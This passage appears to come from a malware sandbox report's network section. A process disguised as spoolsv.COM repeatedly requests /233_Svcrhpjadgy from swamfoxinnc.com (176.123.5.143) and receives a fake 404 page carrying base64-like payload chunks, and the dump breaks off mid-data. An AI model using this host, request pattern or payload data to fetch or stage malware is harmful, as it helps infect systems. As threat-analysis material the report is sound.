Dec 19, 2024 12:39:34.063663960 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.063678026 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.063724041 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.063744068 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.133402109 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.133502007 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.133511066 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.133599997 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.133722067 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.133738041 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.133752108 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.133758068 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.133781910 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.133785963 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.335918903 CET	49744	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.335959911 CET	443	49744	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.336119890 CET	49744	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.336119890 CET	49744	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.336272955 CET	443	49744	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.339333057 CET	49744	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.436857939 CET	49745	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.436901093 CET	443	49745	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.436973095 CET	49745	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.437308073 CET	49745	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.437325001 CET	443	49745	176.123.5.143	192.168.2.4
Dec 19, 2024 12:40:04.918673038 CET	49745	443	192.168.2.4	176.123.5.143

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 12:39:16.636063099 CET	64045	53	192.168.2.4	1.1.1.1
Dec 19, 2024 12:39:16.850737095 CET	53	64045	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 12:39:16.636063099 CET	192.168.2.4	1.1.1.1	0x559	Standard query (0)	swamfoxinnc.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 12:39:16.850737095 CET	1.1.1.1	192.168.2.4	0x559	No error (0)	swamfoxinnc.com		176.123.5.143	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

swamfoxinnc.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	176.123.5.143	443	7828	C:\Users\Public\Libraries\spoolsv.COM

Timestamp	Bytes transferred	Direction	Data
2024-12-19 11:39:18 UTC	164	OUT	GET /233_Svcrhpjadgy HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: swamfoxinnc.com
2024-12-19 11:39:19 UTC	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 19 Dec 2024 11:39:19 GMT Content-Type: text/html Content-Length: 58296 Connection: close Vary: Accept-Encoding ETag: "674db0b4-e3b8"
2024-12-19 11:39:19 UTC	16193	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
2024-12-19 11:39:20 UTC	16384	IN	Data Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54 Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
2024-12-19 11:39:20 UTC	16384	IN	Data Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46 Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
2024-12-19 11:39:20 UTC	9335	IN	Data Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30 Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	176.123.5.143	443	7828	C:\Users\Public\Libraries\spoolsv.COM

Timestamp	Bytes transferred	Direction	Data
2024-12-19 11:39:21 UTC	164	OUT	GET /233_Svcrhpjadgy HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: swamfoxinnc.com
2024-12-19 11:39:23 UTC	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 19 Dec 2024 11:39:23 GMT Content-Type: text/html Content-Length: 58296 Connection: close Vary: Accept-Encoding ETag: "674db0b4-e3b8"
2024-12-19 11:39:23 UTC	16193	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
2024-12-19 11:39:23 UTC	16384	IN	Data Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54 Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
2024-12-19 11:39:23 UTC	16384	IN	Data Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46 Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
2024-12-19 11:39:23 UTC	9335	IN	Data Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30 Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	176.123.5.143	443	7828	C:\Users\Public\Libraries\spoolsv.COM

Timestamp	Bytes transferred	Direction	Data
2024-12-19 11:39:25 UTC	164	OUT	GET /233_Svcrhpjadgy HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: swamfoxinnc.com
2024-12-19 11:39:26 UTC	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 19 Dec 2024 11:39:26 GMT Content-Type: text/html Content-Length: 58296 Connection: close Vary: Accept-Encoding ETag: "674db0b4-e3b8"
2024-12-19 11:39:26 UTC	16193	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
2024-12-19 11:39:26 UTC	16384	IN	Data Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54 Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
2024-12-19 11:39:26 UTC	16384	IN	Data Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46 Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
2024-12-19 11:39:27 UTC	9335	IN	Data Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30 Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	176.123.5.143	443	7828	C:\Users\Public\Libraries\spoolsv.COM

Timestamp	Bytes transferred	Direction	Data
2024-12-19 11:39:28 UTC	164	OUT	GET /233_Svcrhpjadgy HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: swamfoxinnc.com
2024-12-19 11:39:30 UTC	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 19 Dec 2024 11:39:29 GMT Content-Type: text/html Content-Length: 58296 Connection: close Vary: Accept-Encoding ETag: "674db0b4-e3b8"
2024-12-19 11:39:30 UTC	16193	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
2024-12-19 11:39:30 UTC	16384	IN	Data Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54 Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
2024-12-19 11:39:30 UTC	16384	IN	Data Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 